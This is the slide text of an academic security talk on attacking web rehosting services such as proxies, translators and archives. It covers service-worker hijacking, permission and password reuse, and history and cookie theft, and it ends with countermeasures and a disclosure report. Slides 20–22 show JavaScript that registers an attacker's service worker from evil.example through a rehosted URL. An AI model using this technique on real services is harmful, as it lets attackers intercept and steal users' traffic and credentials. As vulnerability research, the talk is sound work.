SLIDE 1 Melting Pot of Origins: Compromising the Intermediary Web Services that Rehost Websites Takuya Watanabe, Eitaro Shioji, Mitsuaki Akiyama, Tatsuya Mori NTT Secure Platform Laboratories, Waseda University, NICT, RIKEN API NDSS Symposium 24th Febtuary, 2020
SLIDE 2
- Study security flaws of web rehosting services
- Present five attacks (e.g., persistent MITM)
- Demonstrate feasibility on real services
- Provide countermeasures
SLIDE 3
A
SLIDE 4
A
SLIDE 5
A
A
rehost fetch
SLIDE 6
SLIDE 7
ProxySite, Hide My Ass!, Hide me, Sitenable Proxy, FilterBypass, ProxFree, toolur, hidester, GenMirror, UnblockVideos, Service-α Google Translate, Bing Translator, Weblio, PROMT, Yandex.Translate, Baidu Translate, Service-β Wayback Machine, Google Cache, FreezePage
SLIDE 8 https://google.com
URL Browse
Direct link: https://rehosted.example/?url=https://google.com
SLIDE 9
A
a.example
B
b.example
A
rehosted.example
B
rehosted.example
SLIDE 10
A
a.example
B
b.example
A
rehosted.example
B
rehosted.example ( Boundary of origins)
SLIDE 11
- URL Rewriting
- Rehostable File Type
- Handling Browser Resources
https://a.example → https://rehosted.example/?url=https://a.example
- HTML, plaintext
- JavaScript (except some translators)
- remain resource accesses via JavaScript
- relay HTTP cookie (web proxy)
SLIDE 12
A
a.example
B
b.example evil.example
A
rehosted.example
B
rehosted.example rehosted.example ( Boundary of origins)
affect
SLIDE 13
A
a.example
B
b.example evil.example Boundary of origins
affect
A
rehosted.example
B
rehosted.example rehosted.example
SLIDE 14
SLIDE 15 A
(2) register script to browser (4) intercept requests /responses (1)visit rehosted malicious page
A
(4) steal stored data (1)visit rehosted pages (3) visit rehosted malicious page (3) visit rehosted pages (2) store data in browser
SLIDE 16 A
(2) register script to browser (4) intercept requests /responses (1)visit rehosted malicious page
A
(4) steal stored data (1)visit rehosted pages (3) visit rehosted malicious page (3) visit rehosted pages (2) store data in browser
SLIDE 17
You are cracked! Pay 10 BTC
SLIDE 18
- SW script, register page, scoped pages
- Powerful feature in HTML 5.1
- Restrictions
- intercept all req./res.
https://a.example/register.html https://a.example/* sw.js
- HTTPS
- Same Origin
- MIME Type (JavaScript)
Scoped pages Register page
SLIDE 19 A
(2) register sw.js to browser (4) intercept requests /responses (1)visit rehosted malicious page (3) visit rehosted pages
Scope: origin of web rehosting service
SLIDE 20
https://evil.example/ register.html sw.js <script> navigator.serviceWorker.register('sw.js'); </script> self.addEventListener('fetch', function(event) { customizeResponse(fetch(event.request)); return; }); register.html sw.js
generate rehosted malicious page: “https://rehosted.example/?url=https://evil.example/register.html”
SLIDE 21 <script> navigator.serviceWorker.register('sw.js'); </script> self.addEventListener('fetch', function(event) { customizeResponse(fetch(event.request)); return; }); register.html sw.js
https://rehosted.example/sw.js (404)
https://evil.example/ register.html sw.js
“https://rehosted.example/?url=https://evil.example/register.html”
SLIDE 22
<script> navigator.serviceWorker.register('https://rehosted.example/ ?url=https://evil.example/sw.js'); </script> self.addEventListener('fetch', function(event) { customizeResponse(fetch(event.request)); return; }); register.html sw.js https://evil.example/ register.html sw.js
“https://rehosted.example/?url=https://evil.example/register.html”
SLIDE 23
URL for website translation (type of web rehosting):
https:// translate.googleusercontent.com/translate_c?u=https://a.example&...
SW attack works
SLIDE 24
URL for website translation (type of web rehosting):
https:// translate.googleusercontent.com/translate_c?u=https://a.example&...
URL for uploaded document translation:
https://translate.googleusercontent.com/translate_f
SLIDE 25
- Techniques to rehost SW scripts on web translator
- Discussion of path scope
- Attack using AppCache instead of SW
- Rewriting fallback pages + cookie bomb
SLIDE 26
You are cracked! Pay 10 BTC
SLIDE 27 A
(2) register script to browser (4) intercept requests /responses (1)visit rehosted malicious page
A
(4) steal stored data (1)visit rehosted pages (3) visit rehosted malicious page (3) visit rehosted pages (2) store data in browser
SLIDE 28 rehosted.example
Latitude Longitude
User grant permission at rehosted benign pages Permission is reused by rehosted malicious page
SLIDE 29 rehosted.example
Latitude Longitude
User grant permission at rehosted benign pages Permission is reused by rehosted malicious page
SLIDE 30 rehosted.example
Latitude Longitude
User grant permission at rehosted benign pages Permission is reused by rehosted malicious page
SLIDE 31
User logs in to rehosted benign page and save credential in password manager Password manager auto-fills credential on fake form of rehosted malicious page
SLIDE 32
User logs in to rehosted benign page and save credential in password manager Password manager auto-fills credential on fake form of rehosted malicious page
SLIDE 33 1. User visits rehosted page.
- 2. Page writes cookie or localStorage by using JavaScript.
- 3. Rehosted malicious page retrieves cookie/localStorage.
- 4. Attacker estimates browsing history by using retrieved data.
document.cookie = “name=value”; localStorage.setItem(‘name', value');
SLIDE 34
Non-identifiable website (has only general cookie names /localStorage keys) Identifiable website (has unique cookie name /localStorage keys)
39.1% of alexa top 10k
SLIDE 35 1. User visits rehosted page.
- 2. Page writes cookie or localStorage by using JavaScript.
- 3. Rehosted malicious page retrieves cookie/localStorage.
- 4. Attacker estimates browsing history.
document.cookie = “name=value”; localStorage.setItem(‘name', value');
SLIDE 36 Domain: .facebook.com Name: xs Value: XXXXXXXXXXXXXXXX Option: HttpOnly Domain: .rehosted.example Name: c[facebook.com][/][xs] Value: XXXXXXXXXXXXXXXX Option: None
Cookie (written by HTTP header) Cookie (written by HTTP header)
SLIDE 37 Domain: .facebook.com Name: xs Value: XXXXXXXXXXXXXXXX Option: HttpOnly Domain: .rehosted.example Name: c[facebook.com][/][xs] Value: XXXXXXXXXXXXXXXX Option: None
Cookie (written by HTTP header) Cookie (written by HTTP header)
SLIDE 38 Domain: .facebook.com Name: xs Value: XXXXXXXXXXXXXXXX Option: HttpOnly Domain: .rehosted.example Name: c[facebook.com][/][xs] Value: XXXXXXXXXXXXXXXX Option: None
Cookie (written by HTTP header) Cookie (written by HTTP header)
SLIDE 41
SLIDE 42
SLIDE 43
- Separate domain names for each rehosted page
https://rehosted.example/?url=a.example https://a-example.rehosted.example/
- Generate tentative URL inaccessible by 3rd party
Inhibit direct links
- Disable SW and AppCache (attack I)
- Use HTTPOnly (attack V)
SLIDE 44
- We reported to affected service providers we examined.
- We plan to make risks more widely known
in cooperation with JPCERT/CC.
- 9 providers responded
- 4 providers certified as vulnerability
- 2 providers asked us not to be named
SLIDE 45 Other web rehosting services? Other attacks?
- iframe [Lerner_CCS'17]
- Persistent XSS [Steffens_NDSS'19]
Human behaviors while using web rehosting?
- Private browsing
- Login
- Permission
SLIDE 46
- Explored security flaws of web rehosting services
- Presented 5 attacks exploiting various web features
- Found that 18 out of 21 services are vulnerable
- Reported risk to service providers with feasible defenses
